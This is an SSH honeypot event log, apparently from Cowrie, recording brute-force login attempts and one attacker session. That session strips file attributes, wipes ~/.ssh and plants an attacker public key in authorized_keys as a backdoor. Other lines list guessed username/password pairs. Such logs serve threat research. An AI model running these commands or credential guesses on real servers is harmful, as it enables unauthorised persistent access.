{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-28T10:56:59.315620Z","src_ip":"27.112.79.123","session":"b307a782a062"}
{"eventid":"cowrie.login.success","username":"root","password":"71717171","message":"login attempt [root/71717171] succeeded","sensor":"my-vps","timestamp":"2025-08-28T10:57:00.425139Z","src_ip":"27.112.79.123","session":"b307a782a062"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T10:57:00.975105Z","src_ip":"27.112.79.123","session":"b307a782a062"}
{"eventid":"cowrie.command.input","input":"cd ~; chattr -ia .ssh; lockr -ia .ssh","message":"CMD: cd ~; chattr -ia .ssh; lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-08-28T10:57:00.975852Z","src_ip":"27.112.79.123","session":"b307a782a062"}
{"eventid":"cowrie.command.failed","input":"lockr -ia .ssh","message":"Command not found: lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-08-28T10:57:00.977194Z","src_ip":"27.112.79.123","session":"b307a782a062"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","size":32,"shasum":"c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","duplicate":true,"duration":"0.3","message":"Closing TTY Log: var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644 after 0.3 seconds","sensor":"my-vps","timestamp":"2025-08-28T10:57:01.253285Z","src_ip":"27.112.79.123","session":"b307a782a062"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T10:57:01.843555Z","src_ip":"27.112.79.123","session":"b307a782a062"}
{"eventid":"cowrie.command.input","input":"cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","message":"CMD: cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","sensor":"my-vps","timestamp":"2025-08-28T10:57:01.844398Z","src_ip":"27.112.79.123","session":"b307a782a062"}
{"eventid":"cowrie.session.file_download","duplicate":true,"outfile":"var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","shasum":"a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","destfile":"/root/.ssh/authorized_keys","message":"Saved redir contents with SHA-256 a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2 to var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","sensor":"my-vps","timestamp":"2025-08-28T10:57:02.113734Z","src_ip":"27.112.79.123","session":"b307a782a062"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","size":0,"shasum":"cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","duplicate":true,"duration":"0.3","message":"Closing TTY Log: var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f after 0.3 seconds","sensor":"my-vps","timestamp":"2025-08-28T10:57:02.114686Z","src_ip":"27.112.79.123","session":"b307a782a062"}
{"eventid":"cowrie.session.connect","src_ip":"27.112.79.123","src_port":54498,"dst_ip":"1.2.3.4","dst_port":22,"session":"67623436f56f","protocol":"ssh","message":"New connection: 27.112.79.123:54498 (1.2.3.4:22) [session: 67623436f56f]","sensor":"my-vps","timestamp":"2025-08-28T10:57:02.390206Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-28T10:57:02.391166Z","src_ip":"27.112.79.123","session":"67623436f56f"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-28T10:57:02.667490Z","src_ip":"27.112.79.123","session":"67623436f56f"}
{"eventid":"cowrie.login.failed","username":"345gs5662d34","password":"345gs5662d34","message":"login attempt [345gs5662d34/345gs5662d34] failed","sensor":"my-vps","timestamp":"2025-08-28T10:57:03.919165Z","src_ip":"27.112.79.123","session":"67623436f56f"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/4355a46b19d348dc2f57c046f8ef63d4538ebb936000f3c9ee954a27460dd865","size":524,"shasum":"4355a46b19d348dc2f57c046f8ef63d4538ebb936000f3c9ee954a27460dd865","duplicate":true,"duration":"180.0","message":"Closing TTY Log: var/lib/cowrie/tty/4355a46b19d348dc2f57c046f8ef63d4538ebb936000f3c9ee954a27460dd865 after 180.0 seconds","sensor":"my-vps","timestamp":"2025-08-28T10:57:04.891132Z","src_ip":"212.227.235.229","session":"99a1348c6480"}
{"eventid":"cowrie.session.closed","duration":180.2096405029297,"message":"Connection lost after 180 seconds","sensor":"my-vps","timestamp":"2025-08-28T10:57:04.895615Z","src_ip":"212.227.235.229","session":"99a1348c6480"}
{"eventid":"cowrie.session.closed","duration":"2.8","message":"Connection lost after 2.8 seconds","sensor":"my-vps","timestamp":"2025-08-28T10:57:05.197377Z","src_ip":"27.112.79.123","session":"67623436f56f"}
{"eventid":"cowrie.session.connect","src_ip":"27.112.79.123","src_port":51794,"dst_ip":"1.2.3.4","dst_port":22,"session":"87915822a591","protocol":"ssh","message":"New connection: 27.112.79.123:51794 (1.2.3.4:22) [session: 87915822a591]","sensor":"my-vps","timestamp":"2025-08-28T10:57:05.457479Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-28T10:57:05.458265Z","src_ip":"27.112.79.123","session":"87915822a591"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-28T10:57:05.722795Z","src_ip":"27.112.79.123","session":"87915822a591"}
{"eventid":"cowrie.login.success","username":"root","password":"3245gs5662d34","message":"login attempt [root/3245gs5662d34] succeeded","sensor":"my-vps","timestamp":"2025-08-28T10:57:06.809943Z","src_ip":"27.112.79.123","session":"87915822a591"}
{"eventid":"cowrie.session.closed","duration":"1.6","message":"Connection lost after 1.6 seconds","sensor":"my-vps","timestamp":"2025-08-28T10:57:07.073326Z","src_ip":"27.112.79.123","session":"87915822a591"}
{"eventid":"cowrie.session.closed","duration":"8.0","message":"Connection lost after 8.0 seconds","sensor":"my-vps","timestamp":"2025-08-28T10:57:07.074171Z","src_ip":"27.112.79.123","session":"b307a782a062"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":38756,"dst_ip":"1.2.3.4","dst_port":22,"session":"14203bb53d12","protocol":"ssh","message":"New connection: 212.227.125.160:38756 (1.2.3.4:22) [session: 14203bb53d12]","sensor":"my-vps","timestamp":"2025-08-28T10:57:42.083951Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T10:57:42.084876Z","src_ip":"212.227.125.160","session":"14203bb53d12"}
{"eventid":"cowrie.client.kex","hassh":"98f63c4d9c87edbd97ed4747fa031019","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 98f63c4d9c87edbd97ed4747fa031019","sensor":"my-vps","timestamp":"2025-08-28T10:57:42.144253Z","src_ip":"212.227.125.160","session":"14203bb53d12"}
{"eventid":"cowrie.login.failed","username":"sol","password":"sol","message":"login attempt [sol/sol] failed","sensor":"my-vps","timestamp":"2025-08-28T10:57:42.325021Z","src_ip":"212.227.125.160","session":"14203bb53d12"}
{"eventid":"cowrie.session.closed","duration":"1.3","message":"Connection lost after 1.3 seconds","sensor":"my-vps","timestamp":"2025-08-28T10:57:43.388546Z","src_ip":"212.227.125.160","session":"14203bb53d12"}
{"eventid":"cowrie.session.connect","src_ip":"217.72.205.35","src_port":63636,"dst_ip":"1.2.3.4","dst_port":22,"session":"728040a6d9e2","protocol":"ssh","message":"New connection: 217.72.205.35:63636 (1.2.3.4:22) [session: 728040a6d9e2]","sensor":"my-vps","timestamp":"2025-08-28T10:57:46.539063Z"}
{"eventid":"cowrie.session.closed","duration":"0.0","message":"Connection lost after 0.0 seconds","sensor":"my-vps","timestamp":"2025-08-28T10:57:46.541297Z","src_ip":"217.72.205.35","session":"728040a6d9e2"}
{"eventid":"cowrie.session.connect","src_ip":"80.94.95.15","src_port":35330,"dst_ip":"1.2.3.4","dst_port":22,"session":"90d5009bc766","protocol":"ssh","message":"New connection: 80.94.95.15:35330 (1.2.3.4:22) [session: 90d5009bc766]","sensor":"my-vps","timestamp":"2025-08-28T10:57:59.251914Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh2_1.9.0","message":"Remote SSH version: SSH-2.0-libssh2_1.9.0","sensor":"my-vps","timestamp":"2025-08-28T10:57:59.253010Z","src_ip":"80.94.95.15","session":"90d5009bc766"}
{"eventid":"cowrie.client.kex","hassh":"57446c12547a668110aa237e5965e374","hasshAlgorithms":"ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,curve25519-sha256,curve25519-sha256@libssh.org,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1;aes128-ctr,aes192-ctr,aes256-ctr,aes256-cbc,rijndael-cbc@lysator.liu.se,aes192-cbc,aes128-cbc,blowfish-cbc,arcfour128,arcfour,cast128-cbc,3des-cbc;hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96,hmac-md5,hmac-md5-96,hmac-ripemd160,hmac-ripemd160@openssh.com;none","kexAlgs":["ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","curve25519-sha256","curve25519-sha256@libssh.org","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1"],"keyAlgs":["ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-ed25519","ssh-rsa","ssh-dss"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes256-cbc","rijndael-cbc@lysator.liu.se","aes192-cbc","aes128-cbc","blowfish-cbc","arcfour128","arcfour","cast128-cbc","3des-cbc"],"macCS":["hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96","hmac-md5","hmac-md5-96","hmac-ripemd160","hmac-ripemd160@openssh.com"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 57446c12547a668110aa237e5965e374","sensor":"my-vps","timestamp":"2025-08-28T10:57:59.303915Z","src_ip":"80.94.95.15","session":"90d5009bc766"}
{"eventid":"cowrie.login.failed","username":"","password":"","message":"login attempt [/] failed","sensor":"my-vps","timestamp":"2025-08-28T10:57:59.593754Z","src_ip":"80.94.95.15","session":"90d5009bc766"}
{"eventid":"cowrie.session.closed","duration":"1.7","message":"Connection lost after 1.7 seconds","sensor":"my-vps","timestamp":"2025-08-28T10:58:00.906567Z","src_ip":"80.94.95.15","session":"90d5009bc766"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":58374,"dst_ip":"1.2.3.4","dst_port":22,"session":"de3c70da537e","protocol":"ssh","message":"New connection: 212.227.125.160:58374 (1.2.3.4:22) [session: de3c70da537e]","sensor":"my-vps","timestamp":"2025-08-28T10:58:03.672842Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh2_1.9.0","message":"Remote SSH version: SSH-2.0-libssh2_1.9.0","sensor":"my-vps","timestamp":"2025-08-28T10:58:03.673753Z","src_ip":"212.227.125.160","session":"de3c70da537e"}
{"eventid":"cowrie.client.kex","hassh":"57446c12547a668110aa237e5965e374","hasshAlgorithms":"ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,curve25519-sha256,curve25519-sha256@libssh.org,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1;aes128-ctr,aes192-ctr,aes256-ctr,aes256-cbc,rijndael-cbc@lysator.liu.se,aes192-cbc,aes128-cbc,blowfish-cbc,arcfour128,arcfour,cast128-cbc,3des-cbc;hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96,hmac-md5,hmac-md5-96,hmac-ripemd160,hmac-ripemd160@openssh.com;none","kexAlgs":["ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","curve25519-sha256","curve25519-sha256@libssh.org","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1"],"keyAlgs":["ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-ed25519","ssh-rsa","ssh-dss"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes256-cbc","rijndael-cbc@lysator.liu.se","aes192-cbc","aes128-cbc","blowfish-cbc","arcfour128","arcfour","cast128-cbc","3des-cbc"],"macCS":["hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96","hmac-md5","hmac-md5-96","hmac-ripemd160","hmac-ripemd160@openssh.com"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 57446c12547a668110aa237e5965e374","sensor":"my-vps","timestamp":"2025-08-28T10:58:03.754976Z","src_ip":"212.227.125.160","session":"de3c70da537e"}
{"eventid":"cowrie.login.failed","username":"sammy","password":"sammy","message":"login attempt [sammy/sammy] failed","sensor":"my-vps","timestamp":"2025-08-28T10:58:04.162373Z","src_ip":"212.227.125.160","session":"de3c70da537e"}
{"eventid":"cowrie.login.failed","username":"sammy","password":"abc123","message":"login attempt [sammy/abc123] failed","sensor":"my-vps","timestamp":"2025-08-28T10:58:05.258040Z","src_ip":"212.227.125.160","session":"de3c70da537e"}
{"eventid":"cowrie.login.failed","username":"sammy","password":"abcd123","message":"login attempt [sammy/abcd123] failed","sensor":"my-vps","timestamp":"2025-08-28T10:58:06.340818Z","src_ip":"212.227.125.160","session":"de3c70da537e"}
{"eventid":"cowrie.login.failed","username":"sammy","password":"abcd1234","message":"login attempt [sammy/abcd1234] failed","sensor":"my-vps","timestamp":"2025-08-28T10:58:07.424185Z","src_ip":"212.227.125.160","session":"de3c70da537e"}
{"eventid":"cowrie.login.failed","username":"sammy","password":"abc1234","message":"login attempt [sammy/abc1234] failed","sensor":"my-vps","timestamp":"2025-08-28T10:58:08.507348Z","src_ip":"212.227.125.160","session":"de3c70da537e"}
{"eventid":"cowrie.session.closed","duration":"5.9","message":"Connection lost after 5.9 seconds","sensor":"my-vps","timestamp":"2025-08-28T10:58:09.591032Z","src_ip":"212.227.125.160","session":"de3c70da537e"}
{"eventid":"cowrie.session.connect","src_ip":"27.112.79.123","src_port":56452,"dst_ip":"1.2.3.4","dst_port":22,"session":"6073271c06b2","protocol":"ssh","message":"New connection: 27.112.79.123:56452 (1.2.3.4:22) [session: 6073271c06b2]","sensor":"my-vps","timestamp":"2025-08-28T10:58:13.379488Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-28T10:58:13.380505Z","src_ip":"27.112.79.123","session":"6073271c06b2"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-28T10:58:13.639633Z","src_ip":"27.112.79.123","session":"6073271c06b2"}
{"eventid":"cowrie.login.failed","username":"guest","password":"guest2023","message":"login attempt [guest/guest2023] failed","sensor":"my-vps","timestamp":"2025-08-28T10:58:14.720166Z","src_ip":"27.112.79.123","session":"6073271c06b2"}
{"eventid":"cowrie.session.closed","duration":"2.6","message":"Connection lost after 2.6 seconds","sensor":"my-vps","timestamp":"2025-08-28T10:58:15.989621Z","src_ip":"27.112.79.123","session":"6073271c06b2"}
{"eventid":"cowrie.session.closed","duration":"120.0","message":"Connection lost after 120.0 seconds","sensor":"my-vps","timestamp":"2025-08-28T10:58:30.200363Z","src_ip":"212.227.235.229","session":"cf2ceebe2839"}
{"eventid":"cowrie.session.connect","src_ip":"27.112.79.123","src_port":58078,"dst_ip":"1.2.3.4","dst_port":22,"session":"a23ac80c55e3","protocol":"ssh","message":"New connection: 27.112.79.123:58078 (1.2.3.4:22) [session: a23ac80c55e3]","sensor":"my-vps","timestamp":"2025-08-28T10:59:28.316592Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-28T10:59:28.317283Z","src_ip":"27.112.79.123","session":"a23ac80c55e3"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-28T10:59:28.587303Z","src_ip":"27.112.79.123","session":"a23ac80c55e3"}
{"eventid":"cowrie.login.failed","username":"hamza","password":"hamza","message":"login attempt [hamza/hamza] failed","sensor":"my-vps","timestamp":"2025-08-28T10:59:29.712184Z","src_ip":"27.112.79.123","session":"a23ac80c55e3"}
{"eventid":"cowrie.session.closed","duration":"2.7","message":"Connection lost after 2.7 seconds","sensor":"my-vps","timestamp":"2025-08-28T10:59:30.984687Z","src_ip":"27.112.79.123","session":"a23ac80c55e3"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":18951,"dst_ip":"1.2.3.4","dst_port":22,"session":"670afb41bbf1","protocol":"ssh","message":"New connection: 212.227.235.229:18951 (1.2.3.4:22) [session: 670afb41bbf1]","sensor":"my-vps","timestamp":"2025-08-28T10:59:40.111103Z"}
{"eventid":"cowrie.session.closed","duration":"0.0","message":"Connection lost after 0.0 seconds","sensor":"my-vps","timestamp":"2025-08-28T10:59:40.112251Z","src_ip":"212.227.235.229","session":"670afb41bbf1"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":19274,"dst_ip":"1.2.3.4","dst_port":22,"session":"9767bcbf0f09","protocol":"ssh","message":"New connection: 212.227.235.229:19274 (1.2.3.4:22) [session: 9767bcbf0f09]","sensor":"my-vps","timestamp":"2025-08-28T10:59:40.249168Z"}
